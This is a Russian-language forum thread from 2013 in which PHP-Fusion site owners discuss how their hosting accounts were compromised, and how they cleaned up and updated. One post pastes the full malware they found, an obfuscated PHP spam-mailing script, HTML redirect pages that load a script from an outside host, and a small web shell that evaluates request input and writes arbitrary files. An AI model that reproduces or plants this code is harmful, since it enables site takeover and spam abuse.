в корне всех сайтов появился wp-conf.php
|
Alex |
Опубликовано 26.02.2013 07:58
|
Администратор
Группа тестеров
Персонал сайта
Сообщений: 1270
Зарегистрирован: 07.11.2010 13:05
|
в корне всех сайтов появился wp-conf.php и 5-7 файлов w(набор цифр)n.php
на хостинге 10 сайтов на фьюжене, 1 ворд пресс, 1 джумла
может быть кто знает через что он проникает и размножается по всему аккаунту |
|
|
|
Serge Renard |
Опубликовано 26.02.2013 08:00
|
Опытный пользователь
Сообщений: 250
Зарегистрирован: 18.02.2013 18:46
|
Название первого файла однозначно наводит на мысль о wordpress. Если это не маскировка или совпадение, конечно. |
|
|
|
Rush |
Опубликовано 26.02.2013 08:02
|
Администратор
Разработчики
Группа поддержки
Сообщений: 1418
Зарегистрирован: 31.08.2010 14:41
|
лиииистииииииииинг!
|
|
|
|
Alex |
Опубликовано 26.02.2013 08:07
|
Администратор
Группа тестеров
Персонал сайта
Сообщений: 1270
Зарегистрирован: 07.11.2010 13:05
|
Serge Renard написал:
Название первого файла однозначно наводит на мысль о wordpress. Если это не маскировка или совпадение, конечно.
тоже так думаю маскировка под файл wp-config.php
можно поподробнее |
|
|
|
jikaka |
Опубликовано 26.02.2013 08:13
|
Супер Администратор
Разработчики
Сообщений: 4849
Зарегистрирован: 26.07.2010 12:10
|
Alex, в пятницу у меня была идентичная ситуация
в корень каждого сайта были загружены следующие файлы:
w35574914n.php
w58108374n.php
w82323321n.php
wp-conf.php
по мимо этого, на каждом сайте были изменены первые 2 файла,
например, articles.php и contact.php
т.е. те файлы, которые идут сразу же после папок
в них в самое начало была добавлена строка
на одном из сайтов, версия двига 7.02.05, был изменен файл viewpage.php, с помощью которого все это дело и внедрили
помимо этого, еще в разные места каждого сайта были запрятаны разные файлы типа: code.php, header.php, file.php и т.д.
и кстати, еще были изменены кое-где пустые index.php
все чистил около 3х часов по изменению дат файлов
PS: ах, да! совсем забыл! на акке нету сторонних движков!
|
|
|
|
Zaxap |
Опубликовано 26.02.2013 08:47
|
Элита
Сообщений: 1090
Зарегистрирован: 05.09.2012 10:32
|
А я то думаю, откуда он...
Хотел стереть, да интернет вырубило, потом забыл...)
Зло не дремлет, а я добрый...
|
|
x1
|
|
|
|
Alex |
Опубликовано 26.02.2013 08:51
|
Администратор
Группа тестеров
Персонал сайта
Сообщений: 1270
Зарегистрирован: 07.11.2010 13:05
|
эта ситуация повторилась уже второй раз, после первого раза удалил все фтп аккаунты и у основного аккаунта сменен пароль,
это происходит у меня только на бегете.
на рбк всё спокойно |
|
|
|
dark |
Опубликовано 26.02.2013 08:52
|
Администратор
Группа поддержки
Сообщений: 222
Зарегистрирован: 05.12.2010 22:22
|
Если ломают через тот эксплоит что в паблике, то в файле profile.php достаточно стереть вывод <!--profile_user_name--> . Это уже отсекет часть школоты которая ручками не сможет проверить что этой строки нет. Хотя по сути это никак не поможет от остальных, лучше все же обновиться. |
|
|
|
jikaka |
Опубликовано 26.02.2013 08:53
|
Супер Администратор
Разработчики
Сообщений: 4849
Зарегистрирован: 26.07.2010 12:10
|
Alex, на акке сайты на фьюжике какой версии?
|
|
|
|
Zaxap |
Опубликовано 26.02.2013 08:54
|
Элита
Сообщений: 1090
Зарегистрирован: 05.09.2012 10:32
|
А th_cache.txt - это что?)
Зло не дремлет, а я добрый...
|
|
|
|
dark |
Опубликовано 26.02.2013 08:56
|
Администратор
Группа поддержки
Сообщений: 222
Зарегистрирован: 05.12.2010 22:22
|
Выложите кто нибудь наконец эти файлы, что мы все гадаем, как экстрасенсы. |
|
|
|
jikaka |
Опубликовано 26.02.2013 08:57
|
Супер Администратор
Разработчики
Сообщений: 4849
Зарегистрирован: 26.07.2010 12:10
|
к сожалению, я все удалил
|
|
|
|
Alex |
Опубликовано 26.02.2013 09:32
|
Администратор
Группа тестеров
Персонал сайта
Сообщений: 1270
Зарегистрирован: 07.11.2010 13:05
|
7,02,05 и 7,02,06
сижу обновляю |
|
|
|
jikaka |
Опубликовано 26.02.2013 09:36
|
Супер Администратор
Разработчики
Сообщений: 4849
Зарегистрирован: 26.07.2010 12:10
|
сижу обновляю
после того как меня сегодня повторно хакнули, тоже обновил все сайты
замечу одно, что в этот раз меньше было нанесено вреда, раза в 3 меньше
|
|
|
|
Pisatel |
Опубликовано 26.02.2013 09:53
|
Ветеран
Сообщений: 678
Зарегистрирован: 08.02.2013 05:51
|
Насколько я понял, "лииииистинг"- человек просит исходный код ему показать.:-) |
|
|
|
Rush |
Опубликовано 26.02.2013 10:09
|
Администратор
Разработчики
Группа поддержки
Сообщений: 1418
Зарегистрирован: 31.08.2010 14:41
|
http://ru.wikiped...%B8%D0%B5)
толку от ваших постов без этого
|
|
x1
|
|
|
|
jikaka |
Опубликовано 26.02.2013 10:29
|
Супер Администратор
Разработчики
Сообщений: 4849
Зарегистрирован: 26.07.2010 12:10
|
вот такие чужеродные файлы внедряются - code.php:
GeSHi: PHP <?php @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3 ($v01b6e203); $v8d777f38 = n9a2d8ce3 ($v8d777f38); $v3d26b0b1 = n9a2d8ce3 ($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76 ($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; if (!in_array('mail', $v619d75f8)) { if ($v10497e3f) { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) die(chr(79).chr(75).md5(1234567890)."+0"); } else { if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) die(chr(79).chr(75).md5(1234567890)."+0"); } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad ($v3a5939e4); if (($vb4a88417 = n7b0ecdff ($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { die(chr(79).chr(75).md5(1234567890)."+1"); } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417"; } function ne667da76 ($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd ($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT ); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff ($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395 ($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395 ($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395 ($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395 ($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395 ($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395 ($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395 ($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad ($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3 ($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>
Добавлено за 0.045 секунд, используя GeSHi 1.0.8.10
global.php:
GeSHi: PHP <html> <head> <script type="text/javascript" src="http://ajax.googleminiapi.com/lib/angular.min.js"></script> <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://www.doctortyir.com"> </head> <body> </body> </html>
Добавлено за 0.018 секунд, используя GeSHi 1.0.8.10
plugin.php
GeSHi: PHP <html> <head> <script type="text/javascript" src="http://ajax.googleminiapi.com/lib/angular.min.js"></script> <META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://www.doctortyir.com"> </head> <body> </body> </html>
Добавлено за 0.018 секунд, используя GeSHi 1.0.8.10
index.php
GeSHi: PHP <?php $rcbam = "69b560d7cab447c84d71891ff5dfa7d7"; if(isset($_REQUEST['ywthcd'])) { $akhl = $_REQUEST['ywthcd']; eval($akhl); exit(); } if(isset($_REQUEST['pbikzigf'])) { $xqtn = $_REQUEST['mijzvivp']; $yssydzj = $_REQUEST['pbikzigf']; $plia = fopen($yssydzj, 'w'); $qgqueh = fwrite($plia, $xqtn); fclose($plia); echo $qgqueh; exit(); } ?>
Добавлено за 0.021 секунд, используя GeSHi 1.0.8.10
|
|
|
|
Rush |
Опубликовано 26.02.2013 11:26
|
Администратор
Разработчики
Группа поддержки
Сообщений: 1418
Зарегистрирован: 31.08.2010 14:41
|
ясно. тупо рассылка спама
|
|
|
|
Zaxap |
Опубликовано 26.02.2013 12:42
|
Элита
Сообщений: 1090
Зарегистрирован: 05.09.2012 10:32
|
Странную весьма вещь я на сайте нашел...
_log404.log с таки вот содержимым:
GeSHi: PHP /w85177271n.php ( 03:03:23 2013-02-23 @ 31.133.40.153 ) /favicon.ico ( 03:03:25 2013-02-23 @ 77.34.20.5 => Zaxap ) /favicon.ico ( 03:03:26 2013-02-23 @ 77.34.20.5 => Zaxap ) /w85177271n.php ( 03:03:28 2013-02-23 @ 31.133.40.153 ) /w85177271n.php ( 03:03:44 2013-02-23 @ 31.133.40.153 ) /favicon.ico ( 03:03:52 2013-02-23 @ 77.34.20.5 => Zaxap )
Добавлено за 0.023 секунд, используя GeSHi 1.0.8.10
Да и еще несколько штук хз, что делают на сервере:)
Зло не дремлет, а я добрый...
|
|
|
|
Alex |
Опубликовано 26.02.2013 12:51
|
Администратор
Группа тестеров
Персонал сайта
Сообщений: 1270
Зарегистрирован: 07.11.2010 13:05
|
Zaxap, это лог скорей всего от хостера того когда и с какого айпи были загружены файлы |
|
|